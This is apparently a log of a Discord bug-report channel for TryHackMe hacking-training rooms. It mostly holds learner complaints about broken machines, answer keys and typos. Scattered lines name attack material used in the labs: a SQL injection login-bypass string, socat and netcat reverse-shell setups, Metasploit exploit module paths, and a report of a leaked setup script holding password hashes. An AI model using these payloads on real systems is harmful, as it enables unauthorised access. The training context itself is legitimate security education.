We have a levelling system based on how many messages you send in the server, provided by the MEE6 bot. Roles are automatically given as you level up, and they range from level 1-10.

• For every minute that you send a message in a text channel, you get a random amount of XP. (Talking in voice chats does not count.)
• The XP required to reach the next level increases significantly as you go up.
• High level members will receive rewards in the near future. 🎁

obsidian kiln
#

If that's an attempt at a spam raid, it's gotta be the worst I've seen :kekw:

short mulch
#

hi, I'm currently working through the File Inclusion room for the JR Pentesting Path and I am on Task 8 trying to submit flag 3. I've found the flag, but it's telling me the answer is wrong, and I've seen a few others in the forums have the same issue. Was wondering if there were any known fixes?

thin crater
#

team

#

not able to connect to target machine

#

Task 6 Privilege Escalation: Sudo

#

connection error

strong kelp
stuck stirrup
livid escarpBOT
#

Gave +1 Rep to @strong kelp

fading glacier
#

In the room: dogcat i cant open the website, the nmap only give me the port 22 open

ornate anchor
#

In gamezone the first SQLi is missing terminator.
Should be:
' or 1=1; --

dusky oriole
#

room/introtoshells: Task 7
question 2 accepts "socat TCP:<IP>...." when it should only accept "socat OPENSSL:<IP>...."

obsidian kiln
wheat fractal
#

Hmmmm maybe I'm thinking about this wrong but one of the questions in the burp-suite intruder seems a little off?

Should this not be 3 positions by the 100 possibilities ?

Answer gets 3 digits but surely it should be 100^3 which would be 1000000 no ?

Maybe its not a bug but just checking.

obsidian kiln
wheat fractal
#

Coolio thanks for that I retract my previous 😄

#

Lol also it would have to be the guy who wrote it who shoots me down 🤣 thanks @obsidian kiln

river timber
#

Hey there. In the ‘Protocols and Servers’ room, Task 6 (POP3), the second question asks about messages available via IMAP even though that isn’t covered until the next section in Task 7. Was it meant to be messages available via POP3? Attaching screenshot with answers and such removed to demonstrate.

slow inlet
#

How do I report a bug?

#

hello?

civic knoll
#

There is currently a bug in the room nax for the metasploit directory I checked a writeup to confirm.

obsidian kiln
slow inlet
glad badger
#

Still, the answer can be found in the task content. 🥳

slow inlet
glad badger
#

What is another term for front-end?

slow inlet
#

is front end

glad badger
#

Read the question again.

slow inlet
#

is front end

#

the question does not say who.

glad badger
#

"describes the side"

slow inlet
slow inlet
livid escarpBOT
#

Gave +1 Rep to @glad badger

forest shuttle
#

Hello

#

For Windows priv esc in jr pentester credentials are not provided for the machines

#

To ssh or rdp into

timber pond
#

In Regular expressions, Task 5, Q.1, the answer format is missing 1 *

#

first part of answer is "^Password:" which is 9 * , while the answer format says its only 8 *

#

this confused me so much

covert nymph
#

ummm

#

so in the NAX room it seems that i cannot submit the right answer which is: || exploit/linux/http/nagios_xi_authenticated_rce ||

#

it keeps saying wrong incorrect answer but after saying eff it and went through a walk through to see if it was really right way of going through it and what do ya know its the right answer so why is it telling me its wrong?

spice thicket
#

🪲

#

oh no! A bug!

vital pine
#

There isn't a bug but in NoSQL room a comma is missing.

#

Idk if it is important

regal tulip
#

safari Version 15.0 didnt allow me to complete some tasks and it is laggy, for exmaple i tried to complete the "view site" task but it wont work or would take time

#

i switched to chrome

#

its not a network error, my wifi is working fine. its an error in safari

rapid hawk
forest shuttle
glad badger
shy cipher
#

can anyone explain this error?

I need user ntlm hash but only getting the administrator one

#

It is last metasploit room of junior pentester path

wheat fractal
#

I don't know where else to put it, but in room https://tryhackme.com/room/vulnerabilitycapstone
Task 2, last question, the hint says "You will need to setup a netcat reverse listener to gain access to the shell." but it's not always true: the exploit 47138 on EDB can be slightly modified to not need a reverse shell.

dusky junco
#

Noted, I'll update the hint @wheat fractal

#

"Some exploits will require you to setup a netcat reverse listener to gain access to the shell"

wheat fractal
#

Yup that seems nice, feels like less of a honeypot haha. Have a nice day!

dusky junco
#

😄

#

Updated

#

Thanks for reporting. And you too (:

sonic willow
#

room: https://tryhackme.com/room/activerecon
task: 3

checking whether a remote system is online is the same as checking you have network connectivity to the remote system, is it not?

In other words, initially, this was used to check network connectivity; however, we are more interested in its different uses: checking whether the remote system is online.

#

same task

the last bullet point is covered by bullet point 2

regal tulip
#

even tho i changed it to computer 3 yesterday and clicked send packet it didnt work at all

#

until i switched to chrome and it worked

#

there is bug within safari

obsidian kiln
glad badger
# regal tulip

Thank you for reporting. We'll investigate this. It does work on Chrome, so I'd advise to use Chrome for now. 🙂

sonic willow
obsidian kiln
sonic willow
#

fair

sonic willow
errant hollow
#

This box is broke, i know how it sounds and you might think i might be doing something wrong(i have checking a walkthrough to a 'T') and this box is just broken
https://tryhackme.com/room/kuberneteschalltdi2020
it was working just fine but it just broke somehow and just refuses connection now even when using the file provided by the room

dusky junco
near compass
obsidian kiln
#

That box hasn't changed in a long time (like, well over a year) -- there hasn't been an opportunity for the box itself to break, so it's either the VPN or something at your end

near compass
obsidian kiln
#

Just checking it now

obsidian kiln
#

The one in the screenshot isn't even active

near compass
near compass
obsidian kiln
#

Now this is interesting. I can replicate the 405 in your box, but not in the one I deployed from the backend. That might be a resource thing, although how, I do not know

#

One sec

near compass
obsidian kiln
#

Yep

#

Try it with 10.10.252.87

#

That won't expire, so I'm not leaving it up, but it demonstrates

#

I gave it more resources than the one in the room gets, which is why I'm thinking it might be a resource thing

#

This is the wrong box

#

What the heck

near compass
obsidian kiln
#

Yes, it will work with that. I deployed it myself

near compass
livid escarpBOT
#

Gave +1 Rep to @obsidian kiln

obsidian kiln
#

Are you sure that 10.10.195.9 is attached to Upload Vulns?

#

Can you screenshot the box at the top of the room?

near compass
#

Yes

obsidian kiln
obsidian kiln
#

Oh, I know what you're doing

near compass
obsidian kiln
#

You're trying to connect to the AttackBox

#

That's why you're getting a 405 -- it's a websocket thing

#

Also why RDP is open...

#

10.10.195.9 is the AttackBox IP

near compass
#

Ohhhh I start to understand

obsidian kiln
#

Click the green "start machine" button

near compass
#

I just did it

#

@obsidian kiln it's OK now
I hadn't differentiated the AttackBox from the Room machine.

Thank you

livid escarpBOT
#

Gave +1 Rep to @obsidian kiln

obsidian kiln
#

Np 🙂

eternal summit
#

Ah you got to that

cloud edge
#

Were can i post this question ?

eternal summit
# cloud edge

This isn't a bug.
Why can't you upload another version?

cloud edge
livid escarpBOT
#

Gave +1 Rep to @eternal summit

pearl chasm
#

I may have found a potential typo in the room Pre Security > Network Fundamentals > Extending Your Network > Firewalls 101. The Hint for Question 1 "What layers of the OSI model do firewalls operate at?" is a bit confusing. It says:

Provide the layers, replacing the following "x" and "y" with the appropriate layer in descending order (i.e. 1,2): Layer x,Layer y

However, both the correct answer and the example show numbers in ascending order. 😅

#

I would post screenshot but I seem unable to do so.

wheat fractal
obsidian kiln
wheat fractal
#

And I get answer form searching in Google from two website and when answer tell me is not correct

#
  • no code return 200 all return 501
rugged canyon
#

would you accept just getting the answer sent to you in a dm.... strongly dislike doing it this way but if restarting the target did not fix the issue then yeah maybe that is the way to go

#

@wheat fractal ⬆️

wheat fractal
rugged canyon
#

just ping shadow if you want the answer as shadow has the correct answer saved as they completed that room about a month ago or so

wheat fractal
rugged canyon
#

otherwise keep going and trying to get it yourself

#

yeah one of the inputs should work with a code 200... if you disabled the http encoding thingies

#

anyway same here time for sleeps

wheat fractal
#

Thank you for your help and I will try again to solve

timber pond
#

decimal to binary - task 3

#

i mistyped and it accepted the wrong answer as correct

#

9 bit binarycursed

eternal summit
#

That's just answer tolerance

pearl chasm
sonic willow
#

the popover also isn't working, presumably because of the link (href)

sonic willow
glass charm
#

Not sure if its a bug or not but a few rooms now I've seen are blooded by the creators or come out already blooded. Sometimes this is a 1k of points or higher in difference. Is this meant to be like this? I imagined the score was cleared when they come out.

eternal summit
fast prawn
#

lmfao

#

there's the /data, readable by all users

#

containing a setup script, which has password hashes for the users and flags for user.txt and root.txt

#

it's password protected and asks for a password but you can just cat the output to see it

strong kelp
fast prawn
#

might want to uncomment those lines

#

atleast it's pw protected

tacit elm
#

-?

fast prawn
#

Which room is that

tacit elm
#

Linux Fundamentals Part 1

#

Ill get a new screen the one i presented is terrible

#

Think i figured it out there is a machine in that room Im guessing i shoud use, my bad! I was the bugg.

#

It was me who was the bugg it works now. Embracing.

teal barn
#

@rain thicket

#

weird nobody reported this one in 268 days

rigid cargo
weak orbit
#

rootme is broken

eternal summit
strong kelp
somber wasp
#

HI!
I have this message [!] This exploit may require manual cleanup of '%TEMP%\LVCJth.vbs' on the target on steel mountain room
I already restart the box but nothing change 😦

eternal summit
terse tinsel
eternal summit
twin tapir
sonic willow
eternal summit
#

Yo wtf

#

THM breaking my room smh

fair rain
#

Hey i guess i found a bug in https://tryhackme.com/room/fileinc task 5 i cant submit my awnser for the first one ("
Give Lab #3 a try to read /etc/passwd. What is the request look like?")

hazy tiger
#

Does it say “uh oh undefined?” @fair rain

fair rain
#

it say nothing

hazy tiger
#

Do you use bitdefender?

fair rain
#

no

hazy tiger
#

Do you have any anti virus?

fair rain
#

no

#

all other task are working

#

only this one not

hazy tiger
#

Have you tried refreshing your page?

fair rain
#

ofcourse

hazy tiger
#

Right click, press “inspect element”, then select the tab called “console”, try to enter the answer and see if any errors appear

fair rain
#

when i press the submit button i receive "POST https://tryhackme.com/api/fileinc/answer net::ERR_CONNECTION_RESET" and when i write the awnser in th console i get "Uncaught SyntaxError: Unexpected token '.'"

hazy tiger
#

Do you have another device that you can try submitting the answer on, such as a mobile phone?

fair rain
#

on my mobile phone it worked

#

thank you very much

steady bloom
#

Hello, on the yara room, task 9

#

there is a python error on the Loki tool

#

So the tool doesn't work and we can't do the task

dusky junco
#

Or two try both 😄

steady bloom
dusky junco
#

Mhm okay

#

I’ll take a look at this today. Thanks

steady bloom
#

thanks 🙂

dusky junco
#

What task are you on?

#

Ah I see

#

Ignore me 😄

uncut prairie
#

I tried yesterday USTOUN, but the same problem still exists. Port 1433 is not open. I even waited for almost an hour in case it would open later.

wintry tartan
eternal summit
#

Answer tolerance!

wintry tartan
#

Mah Gawd!

rigid cargo
#

https://tryhackme.com/room/mitre Task 5, Mitre Shield is now Engage. None of the links work as expected. Some of the questions, like the one about DTE0011 don't make sense since it's been merged into EAC0005

charred summit
#

Hope this is the right place, and apologies if it's a known issue. On the kubernetes TDI 2020 box, I'm just getting a connection refused message with the credentials and config file provided, and nmap doesn't find anything on port 6443. (Or any port apart from 22). I've given it 30+ minutes to start while watching the video. If anyone can confirm if it's a problem with the box, I'd appreciate it, as I really need to improve my understanding and this looks like a very good lesson.

fallow storm
#

I think the network services room is broken all of the pictures dont show up, not a big deal but I really don't know what I'm missing out on

sonic willow
#

room: https://tryhackme.com/room/nmap01
task: 2

in the current simulation, a broadcast from computer1 repeats the packet back to computer1 which is incorrect, a broadcast doesn't repeat out the same port that it came in on

sonic willow
faint vigil
#

have a nice day everybody!

#

cheers

eternal summit
strong kelp
rough mortar
wind wraith
#

Hi @glad badger , has the Yara room (https://tryhackme.com/room/yara), task 11 question 6 been fixed? The question is:
"Back to Valhalla, inspect the Info for this rule. Under Statistics what was the highest rule match per month in the last 2 years? (YYYY/M)". Valhalla only shows 2 years of history, and the room is now 484 days old. I tried two different "YYYY/M" values from the current statistics and neither were accepted.

hexed yarrow
#

It let me enter the answer with .eve instead of .exe

#

Not sure if this counts as bug. But it shouldn't let me do that.

#

Windows Fundamentals 2 Task 3

wheat fractal
#

Hi, I don't know if its a bug or if i'm doing something wrong here, but on the anonymous box, i can't take reverse shell, I'm pretty confident I did everything right, i saw some writeups and they did the same but nothing. Any help?

sonic rover
#

Nah, Thats just the error margin for typos

hexed yarrow
sonic rover
#

@wheat fractal Might be better posting in #room-help

livid escarpBOT
#

Gave +1 Rep to @sonic rover

wheat fractal
#

Hi. Please can you repare the room "zero logon". I am trying to access it it is not possible. The page is broken AGAIN. It does not load.

wheat fractal
#

Will the room "zero logon" be repaired?

eternal summit
sonic willow
wheat fractal
#

i alwasy when using tryhackme

#

its machines dont accept port 22

wind wraith
astral fern
#

Hello guys, in network services room , task 4: Exploiting SMB. The picture is not loaded, could you guys fix it?

midnight junco
#

There may be a bug in the NMAP live host discovery room. I am answering the questions correctly (I've even checked my answers looking up cheat sheets on the internet to confirm my answers) and it's not accepting them. Can I post the answers I am putting in and at least have someone confirm if there's something obvious that I'm missing?

#

nm, reloaded pages and answers now work

steady bloom
#

Every payload failed, even the payload in the demo

wheat fractal
#

LinPrivesc Room; Task: Privilege Escalation: Cron Jobs:
Question: How many cron jobs can you see on the target system?

It is either question is phrased wrongly (how many non-default cron jobs?) or it a mistake in answer.
Correct answer should be 8 since there are 4 defaults (run-parts & anacron) & 4 created by the user. But in Room currently correct answer appears to be ||4|| ?

proper geode
#

Hi there, are the KotH points also contributing to the monthly scores?

hazy tiger
#

They do not, no

#

KOTH points are only for that one KOTH game

atomic anchor
#

In overpass 1 there is a issue when using attack box, or this could be an attackbox problem

||Due to privesc requiring modification to an ip and not being allowed to supply port numbers, it requires really strange work arounds

This wouldn’t be an issue usually, but the attack box is by default using port 80 for something||

eternal summit
atomic anchor
#

My solution was to just download the ovpn pack and quickly host and call to that but I guess I learnt something new

tiny ginkgo
crystal adder
#

Complete the advent or cyber 2 form but I didn't receive the last flag

split mulch
rugged canyon
#

your answer is wrong... @split mulch

#

it is close though but not correct

#

read the question more closely again and then read the list of users and groups

split mulch
#

Ohh,dammit, my bad 😄
Thanks @rugged canyon!

livid escarpBOT
#

Gave +1 Rep to @rugged canyon

rugged canyon
#

no problem.... hope that was a good learning experience

split mulch
#

Overall experience is great, if we are not looking at some fails such as this 😄

hazy tiger
icy holly
#

Hello everyone,

#

not sure if this is a bug but on the complete beginner room Nmap task 14 is asking for number of open|filtered ports, when running the command on the attack box the number of open|filtered ports is 997 which is giving me an incorrect answer

split mulch
livid escarpBOT
#

Gave +1 Rep to @hazy tiger

misty cave
#

my python script for it gets timeouts too

shy widget
#

Its not precisely a bug but it is against the 15 minute "rule".
In the Room Mr Robot Ct, the Elliot's password in fsocity.dic is almost near the end of the file.
My poor wooden PC even with -t 50 was unable to find it even after 3 hours.
As a #suggestion please put it a little higher.

obsidian kiln
#

cc @glad badger

wheat fractal
#

OWASP Juice Shop room, Task 6, Question 3 "Remove all 5-star reviews!" - the page is not showing any five star reviews. Instead you delete a four-star review and it gives you the flag anyway. Not a major bug but thought i'd mention it here as it could confuse some people.

merry nacelle
eternal summit
#

Not really, unless you say what you are finding unclear.

merry nacelle
#

i don't know how can i use ssh to solve this problem of port 80 already used

#

i never did ssh tunneling, that is the method to use ?

eternal summit
#

You SSH into the attackbox to get a command line.
You use this command line to kill the process running on port 80.
You then use the command line to complete the room.

merry nacelle
#

if i kill the process running on port 80, THM will crash

hazy tiger
#

No, it will kill the VNC

#

Hence why you SSH

eternal summit
merry nacelle
#

if VNC crash i don't have any access to either SSH nor attackbox

#

i don't use openvpn

eternal summit
eternal summit
shadow crescent
#

is anyone else struggling to launch an attack box? Mine was fine all day but now I cannot get it to connect

dusky oriole
humble sluice
#

I wasn't sure where to post this since it's not really a bug, but in the OWASP juice shop on task 4 question 2, the last sentence of the first paragraph it says Jame T. Kirk instead of James. Not a gamebreaker, just me being nitpicky.

clear remnant
#

Hello. I joined USTOUN room today and after I found some stuff, I completely stuck. So I started checking up Write-Ups. In the write-ups, everyone mentiones a mssql port which I couldn't find. I already restart the machine twice but it still doesn't show up. Anybody have any ideas?

eternal summit
#

@glad badger I think this might have lost the resource boost

obsidian kiln
#

Again

river timber
#

Ahoy there. In the Windows Fundamentals 1 room - Task 2, the first sentence of the second paragraph appears to not have a proper ending to it, “Windows XP was a popular version of Windows and had a long-running.”

#

Also, later in that same task it is mentioned, “Then arrived Windows 10, which is the current Windows operating system…” That may want to be updated to Windows 11 as the upgrades role out.

split patio
#

#Alfred
Task 3 last question
The root.txt flag is not in the config directory, I have also tried searching for it in the whole filesystem. Anyone have had the same problem?

eternal summit
split patio
livid escarpBOT
#

Gave +1 Rep to @eternal summit

eternal summit
delicate sun
#

thanx man .

brazen island
#

Many rooms that use web applications use fonts.googleapis.com. These fonts cannot be loaded because there is no internet connection and therefore the page takes a very long time to load. Is there a solution for this?

zenith mortar
#

same, but if you do nmap without -p- it will show 2

#

try -sV

livid escarpBOT
#

Gave +1 Rep to @zenith mortar

obsidian kiln
#

It will still error out, but it won't take long to do it.

brazen island
livid escarpBOT
#

Gave +1 Rep to @obsidian kiln

obsidian kiln
#

Np

obtuse musk
#

Hi there 🙂
In the new Password Attacking room (Task 2), the last sentence is missing a word. "Once passwords are obtained, the attacker can password attacks techniques to crack these encrypted or hashed passwords using various tools." Probably 'utilize' or so 🙂 (https://tryhackme.com/room/passwordattacks)

#

In the same room, at the beginning of Task 3: "targetted" is written with just one "t".

obtuse musk
#

Task 3, first text block, The headline should be "Customized Wordlists". And in the last sentence, it should be "..which may be used.."

#

Also, the first sentence in the second block is missing an "a". Maybe someone can read through that room again 🙂

obsidian kiln
#

@glad badger, that's an internally devved one 🙂

#

I'm fixing those problems because I already have it up, but it might be a good idea to go through the thing and have Yasir sort anything else 🙂

#

@obtuse muskSorted those problems -- keep 'em coming if you find any more 🙂

obtuse musk
#

Same room, same task, the fist part of each of these two blocks have a lighter form. Meaning they are thinner.

dense garnet
obtuse musk
dense garnet
obtuse musk
#

The same applies a bit further down:

obtuse musk
#

The 'a' in front of 'crunch' in the last sentence is too much.

#

Task 4, a bit further down, the "that" should be "and".

obtuse musk
#

Task 6, just under the first picture, the sentence should say, "We can see that we have many rules that are available for us to use.".

stuck stirrup
livid escarpBOT
#

Gave +1 Rep to @obtuse musk

midnight junco
#

In the advent of cyber room the linkedin link just goes to imgur

dusky junco
torpid crow
#

Anyone else getting a 502 on file inclusion?

storm needle
#

The new "Password Attacks" room. Task 9's question hint should be "month + year + special character" not "season + year + special character" (I believe after completing the room)

obsidian kiln
#

(Preferably in a spoiler tag, but I can delete anyway)

storm needle
obsidian kiln
#

That got you logged in?

#

If so then yeah, the hint is wrong.

storm needle
obsidian kiln
#

@glad badger ^^
Either way that question ain't gonna be doable in a month, Tim, given it's asking for the current season (well, actually month but the hint is wrong), and, uh, I doubt Yasir intends to update the box and question every month.
Unless there is an autogen in play, in which case kudos, but, if experience is anything to go by I somewhat doubt that. :)

wary cedar
#

Hello. I found a bug in Windows Fundamentals 2. In "change UAC settings" my answer had typo but still was accepted. I have a picture of this, but can't share it here. Where can I send it? Or you just want me to describe my answer?

obsidian kiln
#

!docs verify

tropic flameBOT
wary cedar
livid escarpBOT
#

Gave +1 Rep to @obsidian kiln

wary cedar
#

As you can see, there is a typo in answer. It should be settings not settingd, but this answer still was accepted

obtuse musk
#

Hi there 🙂
In the Password Attack room (https://tryhackme.com/room/passwordattacks) Task 9, just under the last picture before RDP, there's a typo in the sentence: It says "Sprint2021" (with a t ) instead of "Spring2021" (with a g ).

obsidian kiln
dense garnet
#

But this is site wide

wary cedar
obtuse musk
#

In the new Advent of Cyber room, Task 5, second sentence below the comic, there's an "r" missing at the end of the word Office (Chief Information Security Officer) https://tryhackme.com/room/adventofcyber3

obsidian kiln
#

@obtuse muskMate, if they don't hire you for the QA team at this point, they're missing out 😆

outer moat
#

Hi, linuxfundamentalspart1 task7 ... correct is with one > but I accidently send echo password123 >> passwords .. and THM said correct answer (sorry, I can´t add atachment, or do not know how 🙂 )

obtuse musk
outer moat
#

I try partly incorrect answers for a few others, and I guess you're right 😅 .. Ok, nevermind 😄

#

Thank you 🙂

obsidian kiln
#

Aha, niceeee

obtuse musk
analog moth
livid escarpBOT
#

Gave +1 Rep to @obtuse musk

obsidian kiln
stuck stirrup
obsidian kiln
storm needle
wheat fractal
#

In "Common Linux Privesc" room, Task 8, question 4 - there is "cosmetic bug" as the msfvenom command contain one unnecessary "R" at the end. It doesn't effect the command

kindred jungle
#

I seem to be having this same problem, no internet connection

#

i am subbed

#

ah its not loading the message. its the blaster room

hot bison
#

In Jr Penetration Tester Path - File Inclusion - Local File Inclusion - LFI # 2 - Question: Give Lab # 3 a try to read /etc/passwd. What is the request look like? I cannot submit my answer

hot bison
thorny fjord
#

Hi Team...in Password attacks Task 2...i think there is an error in the explanation....It states ''''we will discuss the techniques that could be used to perform password attacks. We will cover various techniques such as a dictionary, brute-force, rule-base, and guessing attacks. All the above techniques are considered active 'online' attacks where the attacker needs to communicate with the target machine to obtain the password in order to gain unauthorized access to the machine'''''''....does it mean that dictionary, brute-force, rule based and guessing are active online attacks since the tasks post this categorizes them as offline password attacks

twilit forge
#

In Principles of Security, Task 4 Question 1 - The asterisk which are input into the Answer Format section are incorrect.
This is what is currently there: '*** ************** *****'
But what is needed is: '*** ******* ****** *****'
The answer has a space in the second portion of asterisk, which is required in the answer to get it correct and the hint does not reveal this. Without this space, either the user will not get it right (despite knowing the answer) or will have to guess at different formats until it is accepted.

The same thing goes for the same room, Task 4 Question 3. You can copy and paste the answer, but the formatting is still incorrect.

gleaming shadow
obtuse musk
twilit forge
gleaming shadow
#

naw it's lookign for a -

#

refresh the page, it's the answer tolerance

sullen edge
#

In Web Enumeration room task 9 question 2 states; "WPScan says that this theme is out of date, what does it suggest is the number of the latest version?"
Answer states it should be "2.0", but the real answer should be 2.1 as the theme was updated on 2021-07-22.

midnight junco
#

in https://tryhackme.com/room/metasploitexploitation, task 6, I believe there is a typo in the instructions for this question. I don't think it's supposed to list the vulnerable machine address, rather the IP address of the attackbox.

eternal summit
#

You're copying the binary from your attackbox/own machine to the target

midnight junco
#

Correct.

#

I'm hosting the file on 10.10.113.55

#

It's listing the IP of the vulnerable box

#

on the vulnerable box, you go to the IP address where you are hosting the file

#

the vulnerable box is 10.10.139.48

#

plus, I don't think it should say ATTACKING_(ipaddress) anyway

cold haven
earnest yoke
#

On Nax (https://tryhackme.com/room/nax) Task 1 question 8 "What is the full path (starting with exploit) for the exploitation module?" seems to be broken. Even when copy&pasting the complete module path from any of the attached write-ups, I am getting "Uh-oh! Your answer is incorrect."

#

Searching through this Discord, the issue seems to be around for at least 8 months, now O.o

dry blade
earnest yoke
#

I'm using the provided attack box which is still running on msf5

#

and msfupdate results in an error

#

a tad bit disappointing, IMHO

dry blade
#

don't possible update msf in the attack box @dusky junco ?

earnest yoke
#

Nope. Neither via msfupdate, nor apt

#
root@ip-10-10-24-92:~# msfupdate 
[*]
[*] Attempting to update the Metasploit Framework...
[*]

Traceback (most recent call last):
    3: from /usr/local/bin/msfupdate:313:in `<main>'
    2: from /usr/local/bin/msfupdate:134:in `run!'
    1: from /usr/local/bin/msfupdate:134:in `chdir'
/usr/local/bin/msfupdate:143:in `block in run!': Cannot determine checkout type: `/opt/metasploit-framework-5101' (RuntimeError)
root@ip-10-10-24-92:~# apt search metasploit
Sorting... Done
Full Text Search... Done
recon-ng/bionic,bionic 4.9.2-1 all
  Web Reconnaissance framework written in Python

root@ip-10-10-24-92:~# 
eternal summit
ivory mortar
#

Hi There,

I have been doing the learning paths. In the Web Fundamentals Learning Path there is a room called LFI which is in a broken state.
Tried first for hours, then looked at write-ups.

It is not possible currently to break-out of the displayed error message: No such file /opt/web/<filename>
Cant break out of it with null-byte / adding commands ( this isn't even mentioned in the write-ups )
So I wanted to share this information ...

obtuse musk
ivory mortar
#

Yes, it is this room.
Strange that it isn't working for me.
Using a fresh Kali VM with no add-ons aside from VIM so it shouldn't interfere.

#

But thank you for checking

timber pond
#

task 8 typo

misty cave
#

Task 6 in https://tryhackme.com/room/nmap03 talks about lines numbers, but there are no numbers on the wireshark screenshots, so it is a little unclear as to which line is which. These could possibly be edited in on the left of the image to make it clearer, and easier to tell what the description is talking about

zenith mortar
#

Has Rudolph been pwned? What password of his appeared in a breach?

wild furnace
#

This is a Windows Based room IP Expiration Time claims to be 2 hrs but IP's Expire long before said time frame and it is reflected no where on site and no warning is given to increase time https://tryhackme.com/room/relevant

obsidian kiln
zenith mortar
#

hi in AOC 2020, day 17 [reverse engineering]

  • there is no explanation whats eax edx etc but it is always keep refering to it

in detailed walkthrough the program for add (file1)
i got completly different dissasembled program (instead of movl $4 , ... i got mov dword [local_ch],4 )

in middle of the room walk say to execute dr again (but didnt mention ds to forward for next step i had to do, also using r2 program)

eternal summit
zenith mortar
eternal summit
#

You should be able to set it

zenith mortar
#

aoc 2020 day 20
last question:

#

hint -> answer for previous question

dull spear
#

Room: Disk Analysis & Autopsy
Task: A user has his full name printed on his desktop wallpaper. What is the user's full name?
Issue: Images aren't loading. Extracting the files and opening them doesn't display.

I've seen other similar and different issues with this room posted here. None of them seemed to get their issues answered. Have the authors abandoned the room?

eternal summit
wheat fractal
#

Oh sorry friend

gleaming shadow
#

@dusky junco The RCE in the OWASP Top 10 room, Task 26 ([Severity 8] Insecure Deserialization - Code Execution) seems to not execute the RCE as described

#

strike my last I'm an idiot and cannot read

wheat fractal
cold haven
gritty whale
#

In the JR Pentester Path, room with File Inclusion, Task 4:

ebon otter
#

the room is a couple years old so this is expected, but the second question in task 3 of the "kenobi" have changed since it was written

When it was written, the number of exploits for proftpd version || 1.3.5|| was || 4 || but when checking the searchexploit, it only list || 3 ||

hazy tiger
#

Istg this room changes all the time

midnight junco
versed yoke
#

Room: WebOSINT
Task: 2
Issue: Outdated answer to the question "What country is listed for the registrant?"
Description: The answer to the abovementioned question is outdated; the registrant's country is Iceland (see https://who.is/whois/republicofkoffee.com) but this answer is not accepted. I cross-checked it with old write-ups and they seem to suggest that the answer used to be Panama; guess the correct answer for this question hasn't been updated.

past cedar
#

As a complete django noob I had big struggle in https://tryhackme.com/room/django [Task 3]/step 2 and 3. The python3 manage.py migrate command always ended in a error. I found the reason and i suggest to add the following lines to step 3 to avoid further struggle for the next django noob:


To create a URLconf in the {app_name} directory, create a file called urls.py. Your app directory should now look like:

{app_name}/ __init__.py admin.py apps.py migrations/ __init__.py models.py tests.py urls.py views.py

In the {app_name}/urls.py file include the following code:

`from django.urls import path

from . import views

urlpatterns = [
path('', views.index, name='index'),
]`


without this step it doesn't work. Found it through the official django doc. my setup: kali vm , python 3.9.7, django 2.2.12 (as recommended in the room). I also used a virtualenv but it should work without it.

dusky oriole
lethal badge
#

Hi

cold haven
versed yoke
#

Room: WebOSINT
Task: 7
Issue: Outdated answer to the question in this task
Description: The answer to the abovementioned question is outdated; the expected answer is "Liquid Web, L.L.C." but it's not possible to figure out the answer using the suggested resource (i.e. viewdns.info) because it now only displays the name as "Liquid Web"; in that sense the expected answer appears to be outdated.

misty cave
dark hearth
upper kite
#

Hi guys, I'm in the Blue room of Complete Beginner. I have had this error for hours, I have not managed to run the exploit correctly. I checked all the settings to make sure they were correct. I rebooted the machine several times and the problem persists, could anyone tell me if the same thing happened to you. I read in forums about the room and many people also had the same thing happen, but I did not find a concrete solution. Thanks in advance

obsidian kiln
dusky oriole
#

in /room/django
can you add a line on how to run the server on another port? It defaults to 8000, which on the attackbox is the port that cyberchef runs on. i enountered this issue and others have asked about it in help rooms
thanks.

python manage.py runserver 7000

snow rain
#

Windows Fundamentals 1/Task 7/6th paragraph

Unclear syntax/Typo

The task asks you to right click a program but never tells you which (Wireshark).

"Let's look at the program on the account you're currently logged into, the built-in administrator account—Right-click to view its Properties."

eager steeple
#

NMAP room/Task 14 Practical

The first question asks if the (MACHINE_IP) responds to ICMP ping but does not list an actual IP

obsidian dirge
#

Network Services 2/Task 6

Section on enumerating SMTP server says that wordlist location is at /usr/share/wordlists/Seclists/Usernames/, should be /usr/share/seclists/Usernames/

obsidian kiln
dusky junco
dense garnet
#

Im on Break Out The Cage and it's starting a different machine, idk what machine it is but weird ports and doesn't seem like Break Out The Cage at all
Edit: I had a conflicting ip address somehow on my VM haha

dusky junco
#

so you can just run python3 -m http.server and it will bind to port 8000 without anything else

reef merlin
# misty cave trying to load up http://10.10.169.100:3000 from https://tryhackme.com/room/25da...

I don't know if the issue reoccurred or if it hasn't been fixed in the first place, but port 3000 on host 10.10.169.100 is still being filtered and doesn't respond to HTTP requests. So Task 14 from https://tryhackme.com/room/25daysofchristmas is impossible to solve at the moment

winged hearth
#

Hi, i got a question about the Room Network Services. For Enumerating FTP, i use an Nmap and it return only the ftp service at port 21. But the answer exepected is about 2 ports open. Is it normal ?

winged hearth
#

thanks anyway

zenith mortar
#

idk if its bug or that because i use msf 6

#

but

#

i am doing ICE room, and stack on task 4
question for exploit suggester
architecture for target ix 64 but service (icecast) is running on x86 and after running
run post/multi/recon/local_exploit_suggester
i only got this one output :/
exploit/windows/local/ms10_092_schelevator
im also using msf6, may be this be a problem why i dont get correct output as expected in question?
i could complete this with a hint where i instead of running post exploit runned search in msf 😦

lilac field
#

morning, is there someone I can message about the "Corp" room? I solved it, but I want to check if some specific things are intended or bugged

wheat fractal
lyric walrus
#

hello

wheat fractal
#

hey

lyric walrus
#

room Dunkle Materie* seems to be unreachable on my end

#

it connects but the page i blank and refreshing isn't working

#

seems like a bug

wheat fractal
lyric walrus
#

same

#

that is for sure a bug a i was able to do your rroom a few day ago

wheat fractal
#

i hope they fix it

#

I'm competing on my first monthly hacker badge

dense garnet
#

I think I got Ben's IP address from 3 years ago 💀

#

both openvpn and regular

#

sorry for @

dusky junco
dense garnet
#

can I say it here?

#

its just in a rooms' .bash_history

#

its an scp command with ben@<ip>

dusky junco
#

You can DM me (:

tired thorn
#

hi

#

the flags in the "All in one" room doesn't work

#

it tells me that the flags are incorrect

#

and I found it in the user.txt and the root.txt

wheat fractal
#

Hints should be named crest 4 and not crest 2. (Room: Bio Hazard).

wheat fractal
#

Nope, it's just another bug

tired thorn
#

oh ok

vagrant sedge
#

try to decode it

tired thorn
#

my bad

#

sorry

#

I feel kinda stupid

#

how could I not seeing it

#

they begin with the same characters 🥲

vagrant sedge
#

its fine dont feel stupid we all do mistakes, did u get it now?

tired thorn
#

yeah thanks

wheat fractal
#

I cant seem to get the browser machine to load in the Yara Room, or connect via ssh. using search I see Ben mentioned he was going to give it a look. Just wanted to leave a comment since I was here. Thank you all for your time supporting these rooms.

dusky junco
dense garnet
dusky junco
livid escarpBOT
#

Gave +1 Rep to @dense garnet

dense garnet
#

Jk

dusky junco
#

😄

brazen gulch
dusky junco
